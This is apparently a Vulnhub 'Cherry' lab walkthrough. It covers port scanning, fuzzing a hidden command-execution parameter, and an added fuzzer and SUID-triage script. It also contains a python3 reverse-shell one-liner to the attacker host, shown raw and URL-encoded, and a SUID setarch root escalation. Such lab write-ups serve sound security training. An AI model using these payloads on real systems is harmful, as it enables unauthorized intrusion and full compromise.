Vulnhub: Cherry machine, detailed testing walkthrough (different methods of obtaining a shell)

Published: 2023-01-31 10:23:11

Cherry

Identifying the target host IP address

Because the target host does not obtain an IP address automatically, refer to my other article to fix that first.

┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:92:75:55      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.178  08:00:27:8b:af:48      1      60  PCS Systemtechnik GmbH          

Kali Linux's built-in netdiscover identifies the target host as 192.168.56.178 (192.168.56.1 is the host-only adapter on the host itself and 192.168.56.100 is the VirtualBox DHCP server; the PCS Systemtechnik GmbH vendor string is the VirtualBox NIC OUI).

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.178 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 20:40 EST
Nmap scan report for 192.168.56.178
Host is up (0.000076s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 8bc6f56e2ca29513a51084a50c83b7ae (RSA)
|   256 38d823063e862ac90f163f2393d9a106 (ECDSA)
|_  256 95b9d4f0984ad90990a45da79d6dce76 (ED25519)
80/tcp    open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Cherry
|_http-server-header: nginx/1.18.0 (Ubuntu)
7755/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Cherry
|_http-server-header: Apache/2.4.41 (Ubuntu)
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|_    HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.93%I=7%D=1/30%Time=63D87184%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
MAC Address: 08:00:27:8B:AF:48 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.01 seconds

The NMAP scan shows four open ports on the target: 22 (SSH, OpenSSH 8.2p1), 80 (HTTP, nginx 1.18.0), 7755 (HTTP, Apache 2.4.41) and 33060. Port 33060 is the MySQL X Protocol listener (the "Invalid message" / HY000 strings in the unrecognised fingerprint are X Protocol error frames), so a MySQL server is running on the box. Both web servers return a page titled Cherry.

Obtaining a shell

Port 80

The site on port 80 serves an image (img.jpg); download it to Kali Linux for local analysis:

┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ ls
img.jpg  nmap_full_scan
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ steghide extract -sf img.jpg                               
Enter passphrase: 
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ stegseek img.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.95% (133.4 MB)           
[!] error: Could not find a valid passphrase.
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ exiftool img.jpg             
ExifTool Version Number         : 12.52
File Name                       : img.jpg
Directory                       : .
File Size                       : 59 kB
File Modification Date/Time     : 2023:01:30 20:43:41-05:00
File Access Date/Time           : 2023:01:30 20:44:03-05:00
File Inode Change Date/Time     : 2023:01:30 20:43:41-05:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 72
Y Resolution                    : 72
Image Width                     : 1024
Image Height                    : 1024
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 1024x1024
Megapixels                      : 1.0

Neither steghide with an empty passphrase, stegseek with its default wordlist, nor exiftool turns up anything hidden in the image, so it is a dead end; move on to the web content itself.

┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ curl http://192.168.56.178/robots.txt     
<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>

┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ nikto -h http://192.168.56.178
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.178
+ Target Hostname:    192.168.56.178
+ Target Port:        80
+ Start Time:         2023-01-30 20:45:10 (GMT-5)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7915 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2023-01-30 20:45:24 (GMT-5) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested



┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ gobuster dir -u http://192.168.56.178 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.178
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2023/01/30 20:46:28 Starting gobuster in directory enumeration mode
===============================================================
/backup               (Status: 301) [Size: 178] [--> http://192.168.56.178/backup/]
Progress: 214882 / 220561 (97.43%)
===============================================================
2023/01/30 20:46:43 Finished
===============================================================
                                                                                  

gobuster finds a backup directory on port 80, but requesting it returns Forbidden.

Port 7755

Naturally the next step is to request the same backup directory on port 7755, where Apache serves it without the restriction nginx applies on port 80. Download the files in it locally:

┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ mv ~/Downloads/latest.tar.gz .                
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ mv ~/Downloads/master.zip .   
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ mv ~/Downloads/master.zip.bak 
mv: missing destination file operand after '/home/kali/Downloads/master.zip.bak'
Try 'mv --help' for more information.
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ mv ~/Downloads/master.zip.bak .
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ ls
img.jpg  latest.tar.gz  master.zip  master.zip.bak  nmap_full_scan

Requesting /backup/command.php returns an empty page. Does it expect a parameter that needs to be fuzzed? Set that aside for now and check whether the downloaded files contain anything useful.

┌──(kali㉿kali)-[~/Vulnhub/Cherry/wordpress]
└─$ gobuster dir -u http://192.168.56.178:7755 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.178:7755
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,html,sh,txt
[+] Timeout:                 10s
===============================================================
2023/01/30 20:54:25 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 281]
/index.html           (Status: 200) [Size: 640]
/.php                 (Status: 403) [Size: 281]
/info.php             (Status: 200) [Size: 72699]
/backup               (Status: 301) [Size: 324] [--> http://192.168.56.178:7755/backup/]
/.php                 (Status: 403) [Size: 281]
/.html                (Status: 403) [Size: 281]
/server-status        (Status: 403) [Size: 281]
Progress: 1097489 / 1102805 (99.52%)
===============================================================
2023/01/30 20:55:31 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/Cherry/wordpress]
└─$ wfuzz -c -u 'http://192.168.56.178:7755/backup/command.php?FUZZ=id' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 22
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.178:7755/backup/command.php?FUZZ=id
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                      
=====================================================================

000001626:   200        13 L     25 W       306 Ch      "backup"            

The parameter name, backup, is fuzzed out almost immediately (--hw 22 hides every response with the baseline word count of 22, leaving only the one whose body changed). Verifying by hand confirms it: command.php?backup=<command> executes the command.
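The parameter discovery above, as an added example that is not part of the original write-up: a small Python fuzzer doing what the wfuzz command does. It requests command.php?<name>=id for every candidate, compares each response's line/word/character counts with a baseline response (a parameter name the script is assumed not to handle) and reports only the names that change it, which is the equivalent of --hw 22. The fetch function is injectable so the logic can be exercised offline; the default target URL, wordlist path and the baseline parameter name are assumptions.

```python
"""Hidden GET parameter discovery by baseline comparison.

Added example for this write-up, not the author's code.  It mirrors the
wfuzz run: request command.php?<name>=id for each candidate and keep the
names whose response differs from a baseline request.  The target URL,
wordlist path and the baseline parameter name are assumptions.
"""
import sys
import urllib.parse
import urllib.request
from typing import Callable, Iterable, List, Tuple

Signature = Tuple[int, int, int]  # lines, words, chars, as wfuzz reports them


def fetch_urllib(url: str, timeout: float = 5.0) -> str:
    """HTTP GET returning the body as text; used against a live target."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def response_signature(body: str) -> Signature:
    """Line / word / character counts of a response body."""
    return (body.count("\n"), len(body.split()), len(body))


def fuzz_param_names(
    base_url: str,
    names: Iterable[str],
    probe_value: str = "id",
    fetch: Callable[[str], str] = fetch_urllib,
) -> List[Tuple[str, Signature]]:
    """Return (name, signature) for each candidate whose response differs
    from the baseline.  The baseline is the response to a parameter name
    the script is assumed not to handle, so anything that changes the
    line/word/char counts is a candidate for manual verification.
    """
    def url_for(name: str) -> str:
        return base_url + "?" + urllib.parse.urlencode({name: probe_value})

    baseline = response_signature(fetch(url_for("zz_no_such_param_zz")))
    hits: List[Tuple[str, Signature]] = []
    for name in names:
        sig = response_signature(fetch(url_for(name)))
        if sig != baseline:
            hits.append((name, sig))
    return hits


def load_wordlist(path: str) -> Iterable[str]:
    """Yield non-empty, non-comment lines of a wordlist."""
    with open(path, errors="ignore") as fh:
        for line in fh:
            word = line.strip()
            if word and not word.startswith("#"):
                yield word


if __name__ == "__main__":
    # Usage: python3 paramfuzz.py <url> <wordlist>; the defaults are
    # assumptions matching the write-up.
    url = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.56.178:7755/backup/command.php"
    words = sys.argv[2] if len(sys.argv) > 2 else "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt"
    for name, (lines, nwords, chars) in fuzz_param_names(url, load_wordlist(words)):
        print(f"{name}: {lines} L {nwords} W {chars} Ch")
```

Comparing against a baseline rather than against a fixed status code is what makes this work here: command.php answers 200 whether or not the parameter is right, so only the size of the body distinguishes a hit.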

Several reverse shell methods were tried; in the end the python3 one-liner below worked:

Payload:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.206",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

URL-encoded request:

http://192.168.56.178:7755/backup/command.php?backup=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.206%22,5555));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.178] 45556
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cherry:/var/www/html/backup$ 

Privilege escalation

Upload linpeas.sh to /tmp on the target, make it executable and run it. Its output shows:


                                         ╔═══════════════════╗
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════                       
                                         ╚═══════════════════╝                                                                
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid                                                   
strings Not Found                                                                                                             
-rwsr-xr-x 1 root root 39K Mar  7  2020 /usr/bin/fusermount                                                                   
-rwsr-xr-x 1 root root 39K Apr  2  2020 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 55K Apr  2  2020 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-sr-x 1 root root 27K Apr  2  2020 /usr/bin/setarch
-rwsr-xr-x 1 root root 87K May 28  2020 /usr/bin/gpasswd
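Triaging a SUID listing like the one above, as an added example that is neither the author's code nor part of linpeas: the parser decodes the mode string (the s or S in the owner and group execute slots), records which user the binary runs as, and ranks the entries so that a setuid-root binary with a documented shell escape comes first while a setuid binary owned by an unprivileged user is flagged as not a root path. KNOWN_SUID_ESCAPES and STOCK_SUID are assumptions standing in for GTFOBins and a stock Ubuntu install; SAMPLE is the listing above, copied into the script as input.

```python
"""SUID/SGID listing triage.

Added example, not the author's code and not part of linpeas.  Parses
`ls -l` style lines (the format linpeas prints), decodes the set-id bits
from the mode string, records who the binary runs as, and ranks entries.
KNOWN_SUID_ESCAPES and STOCK_SUID are assumptions standing in for
GTFOBins and a stock Ubuntu install; SAMPLE is the listing from the
write-up, copied in as input.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Assumed: binaries GTFOBins documents as giving a shell when SUID.
KNOWN_SUID_ESCAPES = {"setarch", "find", "vim", "python", "python3", "bash", "env", "perl", "nmap"}
# Assumed: SUID binaries present on a stock Ubuntu install (not a privesc by themselves).
STOCK_SUID = {"mount", "umount", "fusermount", "gpasswd", "passwd", "sudo", "su", "chsh", "chfn", "newgrp"}

# mode links owner group size month day year path [annotation ...]
LS_LINE = re.compile(
    r"^(?P<mode>[-rwxsStT]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\S+\s+\S+\s+\S+\s+\S+\s+(?P<path>\S+)"
)

# The linpeas output from the write-up, used as sample input.
SAMPLE = """\
-rwsr-xr-x 1 root root 39K Mar  7  2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 39K Apr  2  2020 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 55K Apr  2  2020 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-sr-x 1 root root 27K Apr  2  2020 /usr/bin/setarch
-rwsr-xr-x 1 root root 87K May 28  2020 /usr/bin/gpasswd
"""


@dataclass
class SuidEntry:
    path: str
    owner: str
    group: str
    setuid: bool
    setgid: bool

    @property
    def name(self) -> str:
        return self.path.rsplit("/", 1)[-1]

    @property
    def runs_as_root(self) -> bool:
        """Only a setuid bit on a root-owned file gives euid 0; a setgid-only
        bit or a non-root owner (daemon for /usr/bin/at) does not."""
        return self.setuid and self.owner == "root"


def parse_ls_line(line: str) -> Optional[SuidEntry]:
    m = LS_LINE.match(line.strip())
    if not m:
        return None
    mode = m.group("mode")
    # mode[3] is the owner execute slot and mode[6] the group execute slot:
    # 's' = set-id bit with execute, 'S' = set-id bit without execute.
    return SuidEntry(
        path=m.group("path"),
        owner=m.group("owner"),
        group=m.group("group"),
        setuid=mode[3] in "sS",
        setgid=mode[6] in "sS",
    )


def triage(listing: str) -> List[str]:
    """Paths to try first: setuid-root binaries with a documented shell
    escape that are not part of the stock SUID set."""
    hits = []
    for line in listing.splitlines():
        e = parse_ls_line(line)
        if e is None or not e.runs_as_root:
            continue
        if e.name in KNOWN_SUID_ESCAPES and e.name not in STOCK_SUID:
            hits.append(e.path)
    return hits


def report(listing: str) -> List[str]:
    """One line per set-id entry, saying how it was classified."""
    out = []
    for line in listing.splitlines():
        e = parse_ls_line(line)
        if e is None or not (e.setuid or e.setgid):
            continue
        if e.runs_as_root and e.name in KNOWN_SUID_ESCAPES and e.name not in STOCK_SUID:
            tag = "TRY FIRST (setuid root, known shell escape)"
        elif e.runs_as_root and e.name in STOCK_SUID:
            tag = "stock setuid-root binary"
        elif e.runs_as_root:
            tag = "setuid root, no known escape; inspect manually"
        else:
            tag = f"runs as {e.owner}, not root"
        out.append(f"{e.path}: {tag}")
    return out


if __name__ == "__main__":
    import sys
    # Pipe the linpeas SUID section in, or run without input to use SAMPLE.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE
    print("\n".join(report(text)))
```

The two lists are the part to maintain: a binary that is setuid root and absent from a fresh install of the same distribution is suspicious regardless of whether GTFOBins has an entry for it, so the "inspect manually" bucket deserves a look as well.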

The SUID bit on setarch can be used for privilege escalation. setarch is not setuid on a stock Ubuntu install, which is what makes it stand out among the usual mount, umount, fusermount and gpasswd entries (at is setuid too, but owned by daemon, so it would only yield daemon's privileges). setarch merely sets the execution domain and then execs whatever program it is given, so with the bit set it runs /bin/sh as root; the -p flag keeps the shell from dropping the elevated effective UID.

Escalating with the recipe from the GTFOBins site:

www-data@cherry:/tmp$  /usr/bin/setarch $(arch) /bin/sh -p
 /usr/bin/setarch $(arch) /bin/sh -p
# cd /root
cd /root
# ls -alh
ls -alh
total 44K
drwx------  5 root root 4.0K Sep  7  2020 .
drwxr-xr-x 20 root root 4.0K Sep  7  2020 ..
-rw-------  1 root root  164 Sep  7  2020 .bash_history
-rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
drwxr-xr-x  3 root root 4.0K Sep  7  2020 .local
-rw-------  1 root root   18 Sep  7  2020 .mysql_history
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
drwx------  2 root root 4.0K Sep  7  2020 .ssh
-rw-r--r--  1 root root  255 Sep  7  2020 .wget-hsts
-rw-r--r--  1 root root   46 Sep  7  2020 proof.txt
drwxr-xr-x  3 root root 4.0K Sep  7  2020 snap
# cat proof.txt
cat proof.txt
Sun_CSR_TEAM.af6d45da1f1181347b9e2139f23c6a5b
#  

Root shell and root flag obtained.

From: https://www.cnblogs.com/jason-huawen/p/17078093.html
